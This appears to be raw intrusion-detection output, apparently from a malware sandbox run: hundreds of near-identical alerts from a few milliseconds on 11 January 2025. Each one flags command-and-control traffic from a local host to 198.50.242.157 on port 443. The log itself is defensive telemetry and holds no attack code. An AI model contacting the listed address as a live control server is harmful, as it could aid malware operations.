                  2025-01-11T20:08:05.012215+010020327761Malware Command and Control Activity Detected192.168.2.450124198.50.242.157443TCP
                  2025-01-11T20:08:05.013879+010020327761Malware Command and Control Activity Detected192.168.2.450125198.50.242.157443TCP
                  2025-01-11T20:08:05.015132+010020327761Malware Command and Control Activity Detected192.168.2.450126198.50.242.157443TCP
                  2025-01-11T20:08:05.017798+010020327761Malware Command and Control Activity Detected192.168.2.450127198.50.242.157443TCP
                  2025-01-11T20:08:05.019331+010020327761Malware Command and Control Activity Detected192.168.2.450128198.50.242.157443TCP
                  2025-01-11T20:08:05.020771+010020327761Malware Command and Control Activity Detected192.168.2.450129198.50.242.157443TCP
                  2025-01-11T20:08:05.023988+010020327761Malware Command and Control Activity Detected192.168.2.450132198.50.242.157443TCP
                  2025-01-11T20:08:05.025029+010020327761Malware Command and Control Activity Detected192.168.2.450133198.50.242.157443TCP
                  2025-01-11T20:08:05.026482+010020327761Malware Command and Control Activity Detected192.168.2.450134198.50.242.157443TCP
                  2025-01-11T20:08:05.027542+010020327761Malware Command and Control Activity Detected192.168.2.450135198.50.242.157443TCP
                  2025-01-11T20:08:05.029148+010020327761Malware Command and Control Activity Detected192.168.2.450136198.50.242.157443TCP
                  2025-01-11T20:08:05.030402+010020327761Malware Command and Control Activity Detected192.168.2.450137198.50.242.157443TCP
                  2025-01-11T20:08:05.031779+010020327761Malware Command and Control Activity Detected192.168.2.450138198.50.242.157443TCP
                  2025-01-11T20:08:05.033563+010020327761Malware Command and Control Activity Detected192.168.2.450139198.50.242.157443TCP
                  2025-01-11T20:08:05.034566+010020327761Malware Command and Control Activity Detected192.168.2.450140198.50.242.157443TCP
                  2025-01-11T20:08:05.035739+010020327761Malware Command and Control Activity Detected192.168.2.450141198.50.242.157443TCP
                  2025-01-11T20:08:05.036841+010020327761Malware Command and Control Activity Detected192.168.2.450142198.50.242.157443TCP
                  2025-01-11T20:08:05.038414+010020327761Malware Command and Control Activity Detected192.168.2.450143198.50.242.157443TCP
                  2025-01-11T20:08:05.039790+010020327761Malware Command and Control Activity Detected192.168.2.450144198.50.242.157443TCP
                  2025-01-11T20:08:05.043362+010020327761Malware Command and Control Activity Detected192.168.2.450145198.50.242.157443TCP
                  2025-01-11T20:08:05.046858+010020327761Malware Command and Control Activity Detected192.168.2.450146198.50.242.157443TCP
                  2025-01-11T20:08:05.049385+010020327761Malware Command and Control Activity Detected192.168.2.450147198.50.242.157443TCP
                  2025-01-11T20:08:05.056078+010020327761Malware Command and Control Activity Detected192.168.2.450148198.50.242.157443TCP
                  2025-01-11T20:08:05.060299+010020327761Malware Command and Control Activity Detected192.168.2.450149198.50.242.157443TCP
                  2025-01-11T20:08:05.061759+010020327761Malware Command and Control Activity Detected192.168.2.450150198.50.242.157443TCP
                  2025-01-11T20:08:05.065822+010020327761Malware Command and Control Activity Detected192.168.2.450151198.50.242.157443TCP
                  2025-01-11T20:08:05.067161+010020327761Malware Command and Control Activity Detected192.168.2.450152198.50.242.157443TCP
                  2025-01-11T20:08:05.068680+010020327761Malware Command and Control Activity Detected192.168.2.450153198.50.242.157443TCP
                  2025-01-11T20:08:05.069979+010020327761Malware Command and Control Activity Detected192.168.2.450154198.50.242.157443TCP
                  2025-01-11T20:08:05.071425+010020327761Malware Command and Control Activity Detected192.168.2.450155198.50.242.157443TCP
                  2025-01-11T20:08:05.072274+010020327761Malware Command and Control Activity Detected192.168.2.450156198.50.242.157443TCP
                  2025-01-11T20:08:05.075342+010020327761Malware Command and Control Activity Detected192.168.2.450158198.50.242.157443TCP
                  2025-01-11T20:08:05.077095+010020327761Malware Command and Control Activity Detected192.168.2.450159198.50.242.157443TCP
                  2025-01-11T20:08:05.078037+010020327761Malware Command and Control Activity Detected192.168.2.450160198.50.242.157443TCP
                  2025-01-11T20:08:05.079349+010020327761Malware Command and Control Activity Detected192.168.2.450161198.50.242.157443TCP
                  2025-01-11T20:08:05.083479+010020327761Malware Command and Control Activity Detected192.168.2.450164198.50.242.157443TCP
                  2025-01-11T20:08:05.085624+010020327761Malware Command and Control Activity Detected192.168.2.450165198.50.242.157443TCP
                  2025-01-11T20:08:05.086692+010020327761Malware Command and Control Activity Detected192.168.2.450166198.50.242.157443TCP
                  2025-01-11T20:08:05.087602+010020327761Malware Command and Control Activity Detected192.168.2.450167198.50.242.157443TCP
                  2025-01-11T20:08:05.088836+010020327761Malware Command and Control Activity Detected192.168.2.450168198.50.242.157443TCP
                  2025-01-11T20:08:05.090173+010020327761Malware Command and Control Activity Detected192.168.2.450169198.50.242.157443TCP
                  2025-01-11T20:08:05.091301+010020327761Malware Command and Control Activity Detected192.168.2.450170198.50.242.157443TCP
                  2025-01-11T20:08:05.092332+010020327761Malware Command and Control Activity Detected192.168.2.450171198.50.242.157443TCP
                  2025-01-11T20:08:05.093199+010020327761Malware Command and Control Activity Detected192.168.2.450172198.50.242.157443TCP
                  2025-01-11T20:08:05.094255+010020327761Malware Command and Control Activity Detected192.168.2.450173198.50.242.157443TCP
                  2025-01-11T20:08:05.095644+010020327761Malware Command and Control Activity Detected192.168.2.450174198.50.242.157443TCP
                  2025-01-11T20:08:05.096994+010020327761Malware Command and Control Activity Detected192.168.2.450175198.50.242.157443TCP
                  2025-01-11T20:08:05.097925+010020327761Malware Command and Control Activity Detected192.168.2.450176198.50.242.157443TCP
                  2025-01-11T20:08:05.099099+010020327761Malware Command and Control Activity Detected192.168.2.450177198.50.242.157443TCP
                  2025-01-11T20:08:05.101002+010020327761Malware Command and Control Activity Detected192.168.2.450178198.50.242.157443TCP
                  2025-01-11T20:08:05.101973+010020327761Malware Command and Control Activity Detected192.168.2.450179198.50.242.157443TCP
                  2025-01-11T20:08:05.102962+010020327761Malware Command and Control Activity Detected192.168.2.450180198.50.242.157443TCP
                  2025-01-11T20:08:05.104068+010020327761Malware Command and Control Activity Detected192.168.2.450181198.50.242.157443TCP
                  2025-01-11T20:08:05.105560+010020327761Malware Command and Control Activity Detected192.168.2.450182198.50.242.157443TCP
                  2025-01-11T20:08:05.107049+010020327761Malware Command and Control Activity Detected192.168.2.450183198.50.242.157443TCP
                  2025-01-11T20:08:05.108027+010020327761Malware Command and Control Activity Detected192.168.2.450184198.50.242.157443TCP
                  2025-01-11T20:08:05.113071+010020327761Malware Command and Control Activity Detected192.168.2.450185198.50.242.157443TCP
                  2025-01-11T20:08:05.118394+010020327761Malware Command and Control Activity Detected192.168.2.450187198.50.242.157443TCP
                  2025-01-11T20:08:05.119440+010020327761Malware Command and Control Activity Detected192.168.2.450188198.50.242.157443TCP
                  2025-01-11T20:08:05.120994+010020327761Malware Command and Control Activity Detected192.168.2.450189198.50.242.157443TCP
                  2025-01-11T20:08:05.122101+010020327761Malware Command and Control Activity Detected192.168.2.450190198.50.242.157443TCP
                  2025-01-11T20:08:05.123457+010020327761Malware Command and Control Activity Detected192.168.2.450191198.50.242.157443TCP
                  2025-01-11T20:08:05.124510+010020327761Malware Command and Control Activity Detected192.168.2.450192198.50.242.157443TCP
                  2025-01-11T20:08:05.127871+010020327761Malware Command and Control Activity Detected192.168.2.450193198.50.242.157443TCP
                  2025-01-11T20:08:05.129030+010020327761Malware Command and Control Activity Detected192.168.2.450194198.50.242.157443TCP
                  2025-01-11T20:08:05.130082+010020327761Malware Command and Control Activity Detected192.168.2.450195198.50.242.157443TCP
                  2025-01-11T20:08:05.131483+010020327761Malware Command and Control Activity Detected192.168.2.450196198.50.242.157443TCP
                  2025-01-11T20:08:05.132547+010020327761Malware Command and Control Activity Detected192.168.2.450197198.50.242.157443TCP
                  2025-01-11T20:08:05.134148+010020327761Malware Command and Control Activity Detected192.168.2.450198198.50.242.157443TCP
                  2025-01-11T20:08:05.135050+010020327761Malware Command and Control Activity Detected192.168.2.450199198.50.242.157443TCP
                  2025-01-11T20:08:05.136297+010020327761Malware Command and Control Activity Detected192.168.2.450200198.50.242.157443TCP
                  2025-01-11T20:08:05.137877+010020327761Malware Command and Control Activity Detected192.168.2.450201198.50.242.157443TCP
                  2025-01-11T20:08:05.139420+010020327761Malware Command and Control Activity Detected192.168.2.450202198.50.242.157443TCP
                  2025-01-11T20:08:05.140370+010020327761Malware Command and Control Activity Detected192.168.2.450203198.50.242.157443TCP
                  2025-01-11T20:08:05.141655+010020327761Malware Command and Control Activity Detected192.168.2.450204198.50.242.157443TCP
                  2025-01-11T20:08:05.143099+010020327761Malware Command and Control Activity Detected192.168.2.450205198.50.242.157443TCP
                  2025-01-11T20:08:05.145607+010020327761Malware Command and Control Activity Detected192.168.2.450207198.50.242.157443TCP
                  2025-01-11T20:08:05.148106+010020327761Malware Command and Control Activity Detected192.168.2.450208198.50.242.157443TCP
                  2025-01-11T20:08:05.148993+010020327761Malware Command and Control Activity Detected192.168.2.450209198.50.242.157443TCP
                  2025-01-11T20:08:05.150480+010020327761Malware Command and Control Activity Detected192.168.2.450210198.50.242.157443TCP
                  2025-01-11T20:08:05.151794+010020327761Malware Command and Control Activity Detected192.168.2.450211198.50.242.157443TCP
                  2025-01-11T20:08:05.152794+010020327761Malware Command and Control Activity Detected192.168.2.450212198.50.242.157443TCP
                  2025-01-11T20:08:05.153942+010020327761Malware Command and Control Activity Detected192.168.2.450213198.50.242.157443TCP
                  2025-01-11T20:08:05.155081+010020327761Malware Command and Control Activity Detected192.168.2.450214198.50.242.157443TCP
                  2025-01-11T20:08:05.156140+010020327761Malware Command and Control Activity Detected192.168.2.450215198.50.242.157443TCP
                  2025-01-11T20:08:05.157688+010020327761Malware Command and Control Activity Detected192.168.2.450216198.50.242.157443TCP
                  2025-01-11T20:08:05.158540+010020327761Malware Command and Control Activity Detected192.168.2.450217198.50.242.157443TCP
                  2025-01-11T20:08:05.159591+010020327761Malware Command and Control Activity Detected192.168.2.450218198.50.242.157443TCP
                  2025-01-11T20:08:05.160988+010020327761Malware Command and Control Activity Detected192.168.2.450219198.50.242.157443TCP
                  2025-01-11T20:08:05.161886+010020327761Malware Command and Control Activity Detected192.168.2.450220198.50.242.157443TCP
                  2025-01-11T20:08:05.163200+010020327761Malware Command and Control Activity Detected192.168.2.450221198.50.242.157443TCP
                  2025-01-11T20:08:05.164575+010020327761Malware Command and Control Activity Detected192.168.2.450222198.50.242.157443TCP
                  2025-01-11T20:08:05.165512+010020327761Malware Command and Control Activity Detected192.168.2.450223198.50.242.157443TCP
                  2025-01-11T20:08:05.167006+010020327761Malware Command and Control Activity Detected192.168.2.450224198.50.242.157443TCP
                  2025-01-11T20:08:05.168436+010020327761Malware Command and Control Activity Detected192.168.2.450225198.50.242.157443TCP
                  2025-01-11T20:08:05.169433+010020327761Malware Command and Control Activity Detected192.168.2.450226198.50.242.157443TCP
                  2025-01-11T20:08:05.170441+010020327761Malware Command and Control Activity Detected192.168.2.450227198.50.242.157443TCP
                  2025-01-11T20:08:05.171451+010020327761Malware Command and Control Activity Detected192.168.2.450228198.50.242.157443TCP
                  2025-01-11T20:08:05.173823+010020327761Malware Command and Control Activity Detected192.168.2.450230198.50.242.157443TCP
                  2025-01-11T20:08:05.174747+010020327761Malware Command and Control Activity Detected192.168.2.450231198.50.242.157443TCP
                  2025-01-11T20:08:05.175930+010020327761Malware Command and Control Activity Detected192.168.2.450232198.50.242.157443TCP
                  2025-01-11T20:08:05.176977+010020327761Malware Command and Control Activity Detected192.168.2.450233198.50.242.157443TCP
                  2025-01-11T20:08:05.178241+010020327761Malware Command and Control Activity Detected192.168.2.450234198.50.242.157443TCP
                  2025-01-11T20:08:05.179658+010020327761Malware Command and Control Activity Detected192.168.2.450235198.50.242.157443TCP
                  2025-01-11T20:08:05.180563+010020327761Malware Command and Control Activity Detected192.168.2.450236198.50.242.157443TCP
                  2025-01-11T20:08:05.182000+010020327761Malware Command and Control Activity Detected192.168.2.450237198.50.242.157443TCP
                  2025-01-11T20:08:05.182987+010020327761Malware Command and Control Activity Detected192.168.2.450238198.50.242.157443TCP
                  2025-01-11T20:08:05.184498+010020327761Malware Command and Control Activity Detected192.168.2.450239198.50.242.157443TCP
                  2025-01-11T20:08:05.185655+010020327761Malware Command and Control Activity Detected192.168.2.450240198.50.242.157443TCP
                  2025-01-11T20:08:05.187870+010020327761Malware Command and Control Activity Detected192.168.2.450242198.50.242.157443TCP
                  2025-01-11T20:08:05.188929+010020327761Malware Command and Control Activity Detected192.168.2.450243198.50.242.157443TCP
                  2025-01-11T20:08:05.190528+010020327761Malware Command and Control Activity Detected192.168.2.450244198.50.242.157443TCP
                  2025-01-11T20:08:05.191812+010020327761Malware Command and Control Activity Detected192.168.2.450245198.50.242.157443TCP
                  2025-01-11T20:08:05.192987+010020327761Malware Command and Control Activity Detected192.168.2.450246198.50.242.157443TCP
                  2025-01-11T20:08:05.196212+010020327761Malware Command and Control Activity Detected192.168.2.450247198.50.242.157443TCP
                  2025-01-11T20:08:05.198048+010020327761Malware Command and Control Activity Detected192.168.2.450248198.50.242.157443TCP
                  2025-01-11T20:08:05.201168+010020327761Malware Command and Control Activity Detected192.168.2.450250198.50.242.157443TCP
                  2025-01-11T20:08:05.202436+010020327761Malware Command and Control Activity Detected192.168.2.450251198.50.242.157443TCP
                  2025-01-11T20:08:05.203980+010020327761Malware Command and Control Activity Detected192.168.2.450252198.50.242.157443TCP
                  2025-01-11T20:08:05.205276+010020327761Malware Command and Control Activity Detected192.168.2.450253198.50.242.157443TCP
                  2025-01-11T20:08:05.206972+010020327761Malware Command and Control Activity Detected192.168.2.450254198.50.242.157443TCP
                  2025-01-11T20:08:05.208051+010020327761Malware Command and Control Activity Detected192.168.2.450255198.50.242.157443TCP
                  2025-01-11T20:08:05.212225+010020327761Malware Command and Control Activity Detected192.168.2.450256198.50.242.157443TCP
                  2025-01-11T20:08:05.222896+010020327761Malware Command and Control Activity Detected192.168.2.450257198.50.242.157443TCP
                  2025-01-11T20:08:05.235572+010020327761Malware Command and Control Activity Detected192.168.2.450258198.50.242.157443TCP
                  2025-01-11T20:08:05.236720+010020327761Malware Command and Control Activity Detected192.168.2.450259198.50.242.157443TCP
                  2025-01-11T20:08:05.238288+010020327761Malware Command and Control Activity Detected192.168.2.450260198.50.242.157443TCP
                  2025-01-11T20:08:05.239475+010020327761Malware Command and Control Activity Detected192.168.2.450261198.50.242.157443TCP
                  2025-01-11T20:08:05.240821+010020327761Malware Command and Control Activity Detected192.168.2.450262198.50.242.157443TCP
                  2025-01-11T20:08:05.242149+010020327761Malware Command and Control Activity Detected192.168.2.450263198.50.242.157443TCP
                  2025-01-11T20:08:05.247772+010020327761Malware Command and Control Activity Detected192.168.2.450266198.50.242.157443TCP
                  2025-01-11T20:08:05.249390+010020327761Malware Command and Control Activity Detected192.168.2.450267198.50.242.157443TCP
                  2025-01-11T20:08:05.250364+010020327761Malware Command and Control Activity Detected192.168.2.450268198.50.242.157443TCP
                  2025-01-11T20:08:05.251443+010020327761Malware Command and Control Activity Detected192.168.2.450269198.50.242.157443TCP
                  2025-01-11T20:08:05.252717+010020327761Malware Command and Control Activity Detected192.168.2.450270198.50.242.157443TCP
                  2025-01-11T20:08:05.254325+010020327761Malware Command and Control Activity Detected192.168.2.450271198.50.242.157443TCP
                  2025-01-11T20:08:05.255283+010020327761Malware Command and Control Activity Detected192.168.2.450272198.50.242.157443TCP
                  2025-01-11T20:08:05.256784+010020327761Malware Command and Control Activity Detected192.168.2.450273198.50.242.157443TCP
                  2025-01-11T20:08:05.258325+010020327761Malware Command and Control Activity Detected192.168.2.450274198.50.242.157443TCP
                  2025-01-11T20:08:05.259675+010020327761Malware Command and Control Activity Detected192.168.2.450275198.50.242.157443TCP
                  2025-01-11T20:08:05.261041+010020327761Malware Command and Control Activity Detected192.168.2.450276198.50.242.157443TCP
                  2025-01-11T20:08:05.262183+010020327761Malware Command and Control Activity Detected192.168.2.450277198.50.242.157443TCP
                  2025-01-11T20:08:05.264580+010020327761Malware Command and Control Activity Detected192.168.2.450279198.50.242.157443TCP
                  2025-01-11T20:08:05.266174+010020327761Malware Command and Control Activity Detected192.168.2.450280198.50.242.157443TCP
                  2025-01-11T20:08:05.268313+010020327761Malware Command and Control Activity Detected192.168.2.450281198.50.242.157443TCP
                  2025-01-11T20:08:05.269057+010020327761Malware Command and Control Activity Detected192.168.2.450282198.50.242.157443TCP
                  2025-01-11T20:08:05.270262+010020327761Malware Command and Control Activity Detected192.168.2.450283198.50.242.157443TCP
                  2025-01-11T20:08:05.271076+010020327761Malware Command and Control Activity Detected192.168.2.450284198.50.242.157443TCP
                  2025-01-11T20:08:05.272932+010020327761Malware Command and Control Activity Detected192.168.2.450285198.50.242.157443TCP
                  2025-01-11T20:08:05.274086+010020327761Malware Command and Control Activity Detected192.168.2.450286198.50.242.157443TCP
                  2025-01-11T20:08:05.275139+010020327761Malware Command and Control Activity Detected192.168.2.450287198.50.242.157443TCP
                  2025-01-11T20:08:05.276418+010020327761Malware Command and Control Activity Detected192.168.2.450288198.50.242.157443TCP
                  2025-01-11T20:08:05.277451+010020327761Malware Command and Control Activity Detected192.168.2.450289198.50.242.157443TCP
                  2025-01-11T20:08:05.279246+010020327761Malware Command and Control Activity Detected192.168.2.450290198.50.242.157443TCP
                  2025-01-11T20:08:05.280476+010020327761Malware Command and Control Activity Detected192.168.2.450291198.50.242.157443TCP
                  2025-01-11T20:08:05.281522+010020327761Malware Command and Control Activity Detected192.168.2.450292198.50.242.157443TCP
                  2025-01-11T20:08:05.282542+010020327761Malware Command and Control Activity Detected192.168.2.450293198.50.242.157443TCP
                  2025-01-11T20:08:05.283443+010020327761Malware Command and Control Activity Detected192.168.2.450294198.50.242.157443TCP
                  2025-01-11T20:08:05.284800+010020327761Malware Command and Control Activity Detected192.168.2.450295198.50.242.157443TCP
                  2025-01-11T20:08:05.286354+010020327761Malware Command and Control Activity Detected192.168.2.450296198.50.242.157443TCP
                  2025-01-11T20:08:05.287887+010020327761Malware Command and Control Activity Detected192.168.2.450297198.50.242.157443TCP
                  2025-01-11T20:08:05.298095+010020327761Malware Command and Control Activity Detected192.168.2.450298198.50.242.157443TCP
                  2025-01-11T20:08:05.299787+010020327761Malware Command and Control Activity Detected192.168.2.450299198.50.242.157443TCP
                  2025-01-11T20:08:05.300753+010020327761Malware Command and Control Activity Detected192.168.2.450300198.50.242.157443TCP
                  2025-01-11T20:08:05.301830+010020327761Malware Command and Control Activity Detected192.168.2.450301198.50.242.157443TCP
                  2025-01-11T20:08:05.303380+010020327761Malware Command and Control Activity Detected192.168.2.450302198.50.242.157443TCP
                  2025-01-11T20:08:05.304920+010020327761Malware Command and Control Activity Detected192.168.2.450303198.50.242.157443TCP
                  2025-01-11T20:08:05.309015+010020327761Malware Command and Control Activity Detected192.168.2.450304198.50.242.157443TCP
                  2025-01-11T20:08:05.311453+010020327761Malware Command and Control Activity Detected192.168.2.450305198.50.242.157443TCP
                  2025-01-11T20:08:05.313003+010020327761Malware Command and Control Activity Detected192.168.2.450306198.50.242.157443TCP
                  2025-01-11T20:08:05.317087+010020327761Malware Command and Control Activity Detected192.168.2.450308198.50.242.157443TCP
                  2025-01-11T20:08:05.318013+010020327761Malware Command and Control Activity Detected192.168.2.450309198.50.242.157443TCP
                  2025-01-11T20:08:05.319915+010020327761Malware Command and Control Activity Detected192.168.2.450310198.50.242.157443TCP
                  2025-01-11T20:08:05.321295+010020327761Malware Command and Control Activity Detected192.168.2.450311198.50.242.157443TCP
                  2025-01-11T20:08:05.323352+010020327761Malware Command and Control Activity Detected192.168.2.450312198.50.242.157443TCP
                  2025-01-11T20:08:05.324981+010020327761Malware Command and Control Activity Detected192.168.2.450313198.50.242.157443TCP
                  2025-01-11T20:08:05.326997+010020327761Malware Command and Control Activity Detected192.168.2.450314198.50.242.157443TCP
                  2025-01-11T20:08:05.328279+010020327761Malware Command and Control Activity Detected192.168.2.450315198.50.242.157443TCP
                  2025-01-11T20:08:05.329630+010020327761Malware Command and Control Activity Detected192.168.2.450316198.50.242.157443TCP
                  2025-01-11T20:08:05.331111+010020327761Malware Command and Control Activity Detected192.168.2.450317198.50.242.157443TCP
                  2025-01-11T20:08:05.332677+010020327761Malware Command and Control Activity Detected192.168.2.450318198.50.242.157443TCP
                  2025-01-11T20:08:05.334659+010020327761Malware Command and Control Activity Detected192.168.2.450319198.50.242.157443TCP
                  2025-01-11T20:08:05.341021+010020327761Malware Command and Control Activity Detected192.168.2.450320198.50.242.157443TCP
                  2025-01-11T20:08:05.341942+010020327761Malware Command and Control Activity Detected192.168.2.450321198.50.242.157443TCP
                  2025-01-11T20:08:05.345597+010020327761Malware Command and Control Activity Detected192.168.2.450322198.50.242.157443TCP
                  2025-01-11T20:08:05.347527+010020327761Malware Command and Control Activity Detected192.168.2.450323198.50.242.157443TCP
                  2025-01-11T20:08:05.348695+010020327761Malware Command and Control Activity Detected192.168.2.450324198.50.242.157443TCP
                  2025-01-11T20:08:05.350196+010020327761Malware Command and Control Activity Detected192.168.2.450325198.50.242.157443TCP
                  2025-01-11T20:08:05.351405+010020327761Malware Command and Control Activity Detected192.168.2.450326198.50.242.157443TCP
                  2025-01-11T20:08:05.352688+010020327761Malware Command and Control Activity Detected192.168.2.450327198.50.242.157443TCP
                  2025-01-11T20:08:05.354967+010020327761Malware Command and Control Activity Detected192.168.2.450328198.50.242.157443TCP
                  2025-01-11T20:08:05.356286+010020327761Malware Command and Control Activity Detected192.168.2.450329198.50.242.157443TCP
                  2025-01-11T20:08:05.357628+010020327761Malware Command and Control Activity Detected192.168.2.450330198.50.242.157443TCP
                  2025-01-11T20:08:05.359034+010020327761Malware Command and Control Activity Detected192.168.2.450331198.50.242.157443TCP
                  2025-01-11T20:08:05.360304+010020327761Malware Command and Control Activity Detected192.168.2.450332198.50.242.157443TCP
                  2025-01-11T20:08:05.361783+010020327761Malware Command and Control Activity Detected192.168.2.450333198.50.242.157443TCP
                  2025-01-11T20:08:05.363458+010020327761Malware Command and Control Activity Detected192.168.2.450334198.50.242.157443TCP
                  2025-01-11T20:08:05.365090+010020327761Malware Command and Control Activity Detected192.168.2.450335198.50.242.157443TCP
                  2025-01-11T20:08:05.368814+010020327761Malware Command and Control Activity Detected192.168.2.450336198.50.242.157443TCP
                  2025-01-11T20:08:05.370642+010020327761Malware Command and Control Activity Detected192.168.2.450337198.50.242.157443TCP
                  2025-01-11T20:08:05.371891+010020327761Malware Command and Control Activity Detected192.168.2.450338198.50.242.157443TCP
                  2025-01-11T20:08:05.373679+010020327761Malware Command and Control Activity Detected192.168.2.450339198.50.242.157443TCP
                  2025-01-11T20:08:05.374905+010020327761Malware Command and Control Activity Detected192.168.2.450340198.50.242.157443TCP
                  2025-01-11T20:08:05.376980+010020327761Malware Command and Control Activity Detected192.168.2.450341198.50.242.157443TCP
                  2025-01-11T20:08:05.378231+010020327761Malware Command and Control Activity Detected192.168.2.450342198.50.242.157443TCP
                  2025-01-11T20:08:05.379784+010020327761Malware Command and Control Activity Detected192.168.2.450343198.50.242.157443TCP
                  2025-01-11T20:08:05.381833+010020327761Malware Command and Control Activity Detected192.168.2.450344198.50.242.157443TCP
                  2025-01-11T20:08:05.383133+010020327761Malware Command and Control Activity Detected192.168.2.450345198.50.242.157443TCP
                  2025-01-11T20:08:05.384132+010020327761Malware Command and Control Activity Detected192.168.2.450346198.50.242.157443TCP
                  2025-01-11T20:08:05.385385+010020327761Malware Command and Control Activity Detected192.168.2.450347198.50.242.157443TCP
                  2025-01-11T20:08:05.386834+010020327761Malware Command and Control Activity Detected192.168.2.450348198.50.242.157443TCP
                  2025-01-11T20:08:05.388281+010020327761Malware Command and Control Activity Detected192.168.2.450349198.50.242.157443TCP
                  2025-01-11T20:08:05.389837+010020327761Malware Command and Control Activity Detected192.168.2.450350198.50.242.157443TCP
                  2025-01-11T20:08:05.392847+010020327761Malware Command and Control Activity Detected192.168.2.450351198.50.242.157443TCP
                  2025-01-11T20:08:05.394675+010020327761Malware Command and Control Activity Detected192.168.2.450352198.50.242.157443TCP
                  2025-01-11T20:08:05.396211+010020327761Malware Command and Control Activity Detected192.168.2.450353198.50.242.157443TCP
                  2025-01-11T20:08:05.397264+010020327761Malware Command and Control Activity Detected192.168.2.450354198.50.242.157443TCP
                  2025-01-11T20:08:05.399202+010020327761Malware Command and Control Activity Detected192.168.2.450355198.50.242.157443TCP
                  2025-01-11T20:08:05.400991+010020327761Malware Command and Control Activity Detected192.168.2.450356198.50.242.157443TCP
                  2025-01-11T20:08:05.403643+010020327761Malware Command and Control Activity Detected192.168.2.450357198.50.242.157443TCP
                  2025-01-11T20:08:05.405378+010020327761Malware Command and Control Activity Detected192.168.2.450358198.50.242.157443TCP
                  2025-01-11T20:08:05.406781+010020327761Malware Command and Control Activity Detected192.168.2.450359198.50.242.157443TCP
                  2025-01-11T20:08:05.410494+010020327761Malware Command and Control Activity Detected192.168.2.450361198.50.242.157443TCP
                  2025-01-11T20:08:05.411750+010020327761Malware Command and Control Activity Detected192.168.2.450362198.50.242.157443TCP
                  2025-01-11T20:08:05.413081+010020327761Malware Command and Control Activity Detected192.168.2.450363198.50.242.157443TCP
                  2025-01-11T20:08:05.415745+010020327761Malware Command and Control Activity Detected192.168.2.450364198.50.242.157443TCP
                  2025-01-11T20:08:05.418331+010020327761Malware Command and Control Activity Detected192.168.2.450365198.50.242.157443TCP
                  2025-01-11T20:08:05.419831+010020327761Malware Command and Control Activity Detected192.168.2.450366198.50.242.157443TCP
                  2025-01-11T20:08:05.421106+010020327761Malware Command and Control Activity Detected192.168.2.450367198.50.242.157443TCP
                  2025-01-11T20:08:05.422933+010020327761Malware Command and Control Activity Detected192.168.2.450368198.50.242.157443TCP
                  2025-01-11T20:08:05.425366+010020327761Malware Command and Control Activity Detected192.168.2.450370198.50.242.157443TCP
                  2025-01-11T20:08:05.426903+010020327761Malware Command and Control Activity Detected192.168.2.450371198.50.242.157443TCP
                  2025-01-11T20:08:05.428101+010020327761Malware Command and Control Activity Detected192.168.2.450372198.50.242.157443TCP
                  2025-01-11T20:08:05.429497+010020327761Malware Command and Control Activity Detected192.168.2.450373198.50.242.157443TCP
                  2025-01-11T20:08:05.430857+010020327761Malware Command and Control Activity Detected192.168.2.450374198.50.242.157443TCP
                  2025-01-11T20:08:05.432295+010020327761Malware Command and Control Activity Detected192.168.2.450375198.50.242.157443TCP
                  2025-01-11T20:08:05.433589+010020327761Malware Command and Control Activity Detected192.168.2.450376198.50.242.157443TCP
                  2025-01-11T20:08:05.438766+010020327761Malware Command and Control Activity Detected192.168.2.450378198.50.242.157443TCP
                  2025-01-11T20:08:05.440922+010020327761Malware Command and Control Activity Detected192.168.2.450379198.50.242.157443TCP
                  2025-01-11T20:08:05.442318+010020327761Malware Command and Control Activity Detected192.168.2.450380198.50.242.157443TCP
                  2025-01-11T20:08:05.443688+010020327761Malware Command and Control Activity Detected192.168.2.450381198.50.242.157443TCP
                  2025-01-11T20:08:05.445005+010020327761Malware Command and Control Activity Detected192.168.2.450382198.50.242.157443TCP
                  2025-01-11T20:08:05.446057+010020327761Malware Command and Control Activity Detected192.168.2.450383198.50.242.157443TCP
                  2025-01-11T20:08:05.448055+010020327761Malware Command and Control Activity Detected192.168.2.450384198.50.242.157443TCP
                  2025-01-11T20:08:05.449711+010020327761Malware Command and Control Activity Detected192.168.2.450385198.50.242.157443TCP
                  2025-01-11T20:08:05.451209+010020327761Malware Command and Control Activity Detected192.168.2.450386198.50.242.157443TCP
                  2025-01-11T20:08:05.452375+010020327761Malware Command and Control Activity Detected192.168.2.450387198.50.242.157443TCP
                  2025-01-11T20:08:05.453851+010020327761Malware Command and Control Activity Detected192.168.2.450388198.50.242.157443TCP
                  2025-01-11T20:08:05.455050+010020327761Malware Command and Control Activity Detected192.168.2.450389198.50.242.157443TCP
                  2025-01-11T20:08:05.456083+010020327761Malware Command and Control Activity Detected192.168.2.450390198.50.242.157443TCP
                  2025-01-11T20:08:05.457642+010020327761Malware Command and Control Activity Detected192.168.2.450391198.50.242.157443TCP
                  2025-01-11T20:08:05.463379+010020327761Malware Command and Control Activity Detected192.168.2.450393198.50.242.157443TCP
                  2025-01-11T20:08:05.464642+010020327761Malware Command and Control Activity Detected192.168.2.450394198.50.242.157443TCP
                  2025-01-11T20:08:05.466200+010020327761Malware Command and Control Activity Detected192.168.2.450395198.50.242.157443TCP
                  2025-01-11T20:08:05.467615+010020327761Malware Command and Control Activity Detected192.168.2.450396198.50.242.157443TCP
                  2025-01-11T20:08:05.469092+010020327761Malware Command and Control Activity Detected192.168.2.450397198.50.242.157443TCP
                  2025-01-11T20:08:05.470400+010020327761Malware Command and Control Activity Detected192.168.2.450398198.50.242.157443TCP
                  2025-01-11T20:08:05.471452+010020327761Malware Command and Control Activity Detected192.168.2.450399198.50.242.157443TCP
                  2025-01-11T20:08:05.472779+010020327761Malware Command and Control Activity Detected192.168.2.450400198.50.242.157443TCP
                  2025-01-11T20:08:05.473922+010020327761Malware Command and Control Activity Detected192.168.2.450401198.50.242.157443TCP
                  2025-01-11T20:08:05.475414+010020327761Malware Command and Control Activity Detected192.168.2.450402198.50.242.157443TCP
                  2025-01-11T20:08:05.476766+010020327761Malware Command and Control Activity Detected192.168.2.450403198.50.242.157443TCP
                  2025-01-11T20:08:05.479495+010020327761Malware Command and Control Activity Detected192.168.2.450405198.50.242.157443TCP
                  2025-01-11T20:08:05.483640+010020327761Malware Command and Control Activity Detected192.168.2.450406198.50.242.157443TCP
                  2025-01-11T20:08:05.485213+010020327761Malware Command and Control Activity Detected192.168.2.450407198.50.242.157443TCP
                  2025-01-11T20:08:05.487863+010020327761Malware Command and Control Activity Detected192.168.2.450409198.50.242.157443TCP
                  2025-01-11T20:08:05.489300+010020327761Malware Command and Control Activity Detected192.168.2.450410198.50.242.157443TCP
